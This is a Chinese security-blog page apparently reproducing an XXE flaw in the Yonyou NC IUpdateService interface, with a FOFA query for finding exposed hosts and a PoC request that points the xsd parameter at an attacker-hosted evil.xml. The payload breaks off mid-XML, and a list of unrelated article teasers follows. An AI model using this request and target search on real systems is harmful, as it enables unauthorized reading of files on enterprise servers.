用友 NC IUpdateService XXE漏洞复现

0x01 产品简介

用友 NC 是用友网络科技股份有限公司开发的一款大型企业数字化平台。

0x02 漏洞概述

用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。

0x03 复现环境

FOFA:

app="用友-UFIDA-NC"

0x04 漏洞概述

PoC

GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/evil.xml HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

任意文件读取利用,需要VPS上建立对应操作系统的xml文件,然后开启http服务。xml文件如下 

windows:
<?xml version="1.0"?><!DOCTY

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/297524.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

2024年5大海外代理IP测评推荐

2024年5大海外代理IP测评推荐

在跨境电商行业&#xff0c;想要发送安全运营跨境电商账号&#xff0c;多账号社媒推广&#xff0c;独立站SEO优化等等的业务都少不了代理IP工具。安全高质的代理IP可以保障你的网络活动安全、匿名、高效。 面对众多代理IP商&#xff0c;您是否很难做出购买决定&#xff1f;哪些…
阅读更多...
Typora设置 “图片自动保存到文档对应目录下” 的方法(亲测有效)

Typora设置 “图片自动保存到文档对应目录下” 的方法(亲测有效)

众所周知&#xff0c;typora是程序员非常喜爱的一款笔记软件&#xff0c;但它也有缺点 如&#xff1a;当我们要将旧电脑的写好的文件转移到新的电脑上时&#xff0c;如果简单的将图片文件放在一起&#xff0c;那么文件就会不好对应&#xff0c;那么如何让笔记中所包含的照片自…
阅读更多...
基于PHP的花店管理系统

基于PHP的花店管理系统

有需要请加文章底部Q哦 可远程调试 基于PHP的花店管理系统 一 介绍 此花店管理系统基于原生PHP开发&#xff0c;数据库mysql&#xff0c;前端bootstrap。系统角色分为用户和管理员。(附带参考设计文档) 技术栈&#xff1a;phpmysqlbootstrapphpstudyvscode 二 功能 用户 1 …
阅读更多...
如何配置 VS Code 实现 git 密码免输入

如何配置 VS Code 实现 git 密码免输入

目录 问题描述尝试过的失败方法问题分析最终采用的解决方案&#xff1a;利用 ssh key 提供密码免输入功能安装 git windows 命令工具在windows本地生成 ssh key将公钥安装到 git 服务器第一种方法第二种方法调试方法 参考资料: 问题描述 在 Windows 上&#xff0c;使用 Visual…
阅读更多...
SSM在线员工订餐网站平台----计算机毕业设计

SSM在线员工订餐网站平台----计算机毕业设计

项目介绍 本项目分为前后台&#xff0c;前台为普通用户登录&#xff0c;后台为管理员登录&#xff1b; 用户角色包含以下功能&#xff1a; 用户登录与注册,查看首页,查看菜品详情,查看购物车,提交订单,查看订单,修改个人信息等功能。 管理员角色包含以下功能&#xff1a; 管…
阅读更多...
python中parsel模块的css解析

python中parsel模块的css解析

一、爬虫页面分类 1.想要爬取的内容全部在标签中&#xff0c;可以使用xpath去进行解析如下图 2.想要爬取的内容呈现json的数据特征&#xff0c;用.json()转换为字典格式 3.页面不规则&#xff0c;标签中包含大括号&#xff0c;如下面想要获取键值内容怎么做&#xff0c;先用re正…
阅读更多...
数据分析师的转型之路—本人真实经历

数据分析师的转型之路—本人真实经历

数据分析师的转型之路 前提 本篇文章讲的内容主要针对非计算机专业&#xff0c;数学专业&#xff08;含统计学&#xff09;&#xff0c;数据类专业的大学生或研究生想转行或了解数据分析师的朋友们。因为计算机或数学专业算是专业对口&#xff0c;对数据分析这个岗位应该是比较…
阅读更多...
Supershell反溯源配置

Supershell反溯源配置

简介 项目地址&#xff1a;https://github.com/tdragon6/Supershell Supershell是一个集成了reverse_ssh服务的WEB管理平台&#xff0c;使用docker一键部署&#xff08;快速构建&#xff09;&#xff0c;支持团队协作进行C2远程控制&#xff0c;通过在目标主机上建立反向SSH隧…
阅读更多...
250:vue+openlayers 加载geotiff文件,并在地图上显示

250:vue+openlayers 加载geotiff文件,并在地图上显示

第250个 点击查看专栏目录 本示例的目的是介绍演示如何在vue+openlayers中加载geotiff文件,并在地图上显示。这里使用到了WebGLTile图层和GeoTIFF脚本模块。这里一定要注意GeoTIFF的数据加载方式,要数组的模式。 直接复制下面的 vue+openlayers源代码,操作2分钟即可运行实现…
阅读更多...
SpringCloud微服务 【实用篇】| Dockerfile自定义镜像、DockerCompose

SpringCloud微服务 【实用篇】| Dockerfile自定义镜像、DockerCompose

目录 一&#xff1a;Dockerfile自定义镜像 1. 镜像结构 2. Dockerfile语法 3. 构建Java项目 二&#xff1a; Docker-Compose 1. 初识DockerCompose 2. 部署微服务集群 前些天突然发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;…
阅读更多...
RedisInsight - Redis官方可视化工具

RedisInsight - Redis官方可视化工具

一、RedisInsight 简介 RedisInsight 是一个直观高效的 Redis GUI 管理工具&#xff0c;它可以对 Redis 的内存、连接数、命中率以及正常运行时间进行监控&#xff0c;并且可以在界面上使用 CLI 和连接的 Redis 进行交互&#xff08;RedisInsight 内置对 Redis 模块支持&#…
阅读更多...
UE5 给自己的数字人重定向Mixamo动画

UE5 给自己的数字人重定向Mixamo动画

1 、准备动画骨格文件&#xff0c;动画文件&#xff0c;下面是Mixamo动画素材下载网站Mixamo动画骨格文件下载网站https://www.mixamo.com/2、下载动画骨格文件&#xff0c;打Mixamo网站&#xff0c;选择Characters骨格菜单&#xff0c;在下面找到对应的骨格。如下图所示&#…
阅读更多...
在Ubuntu22.04上离线部署Tailchat(一)

在Ubuntu22.04上离线部署Tailchat(一)

一&#xff1a;Tailchat介绍 Tailchat 是一款插件化易拓展的开源 IM 应用。可拓展架构赋予 Tailchat 无限可能性。前端微内核架构 后端微服务架构 使得 Tailchat 能够驾驭任何定制化/私有化的场景&#xff0c;是面向企业与私域用户打造&#xff0c;高度自由的群组管理与定制化…
阅读更多...
csdn中的资源文件如何删除?

csdn中的资源文件如何删除?

csdn中的资源文件如何删除&#xff1f; 然后写文章的时候 点击资源绑定&#xff0c;解锁资源&#xff0c;就可以再次上传。
阅读更多...
玫瑰之国保加利亚与葡萄酒的碰撞

玫瑰之国保加利亚与葡萄酒的碰撞

玫瑰之国保加利亚与葡萄酒的碰撞 一、玫瑰与葡萄美酒 提起保加利亚&#xff0c;大家第一个想到的可能就是玫瑰花&#xff0c;没错&#xff0c;保加利亚就是被誉为“上帝后花园”的玫瑰之国&#xff0c;每年从这里出产的玫瑰与玫瑰精油&#xff0c;可以说受到了全球消费者的喜爱…
阅读更多...
idea将本地编译好的代码上传到hub镜像仓库

idea将本地编译好的代码上传到hub镜像仓库

第一步&#xff1a;编译打包本地的文件 package 第二步&#xff1a;执行docker bulid打包命令 docker build -t sunyuhua/algo-ability:1.0.0 .sunyuhuasunyuhua-HKF-WXX:~/workspace/shbgit/algo-ability$ docker build -t sunyuhua/algo-ability:1.0.0 . [] Building 141.…
阅读更多...
I.MX6ULL开发笔记(三)——挂载NFS网络文件系统

I.MX6ULL开发笔记(三)——挂载NFS网络文件系统

0x01 网络文件系统 当我们在编译一个文件时&#xff0c;正常是在一个pc上编译好一个文件&#xff0c;之后丢到开发板上去运行。如果有了NFS网络文件系统&#xff0c;那么我们就可以在PC以及开发板上共享文件了。 网络文件系统&#xff0c;常被称为NFS&#xff08;Network Fil…
阅读更多...
操作系统期末复习知识点

操作系统期末复习知识点

目录 一.概论 1.操作系统的介绍 2.特性 3.主要功能 4.作用 二.进程的描述与控制 1.进程的定义 2.特性 3.进程的创建步骤 4.基本状态转化 5.PCB的作用 6.进程与线程的比较 三.进程同步 1.同步的概念&#xff08;挺重要的&#xff09; 2.临界区 3.管程和进程的区…
阅读更多...
python中抓取小米应用商城xpath实例

python中抓取小米应用商城xpath实例

页面源码: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <title>手机游戏应用商店_软件商店app下载-小米应用商店</title> <…
阅读更多...
网络通信(10)-C#TCP客户端实例

网络通信(10)-C#TCP客户端实例

本文使用Socket在C#语言环境下完成TCP客户端的实例。 实例完成的功能: 客户端与服务器连接,实现实时刷新状态。 客户端接收服务器的数据。 客户端发送给服务器的数据。 客户端实时判定状态,断开连接后自动重连。 客户端与服务器端发送心跳包。 在VS中创建C# Winform项…
阅读更多...
最新文章

Copyright @ 2022~2023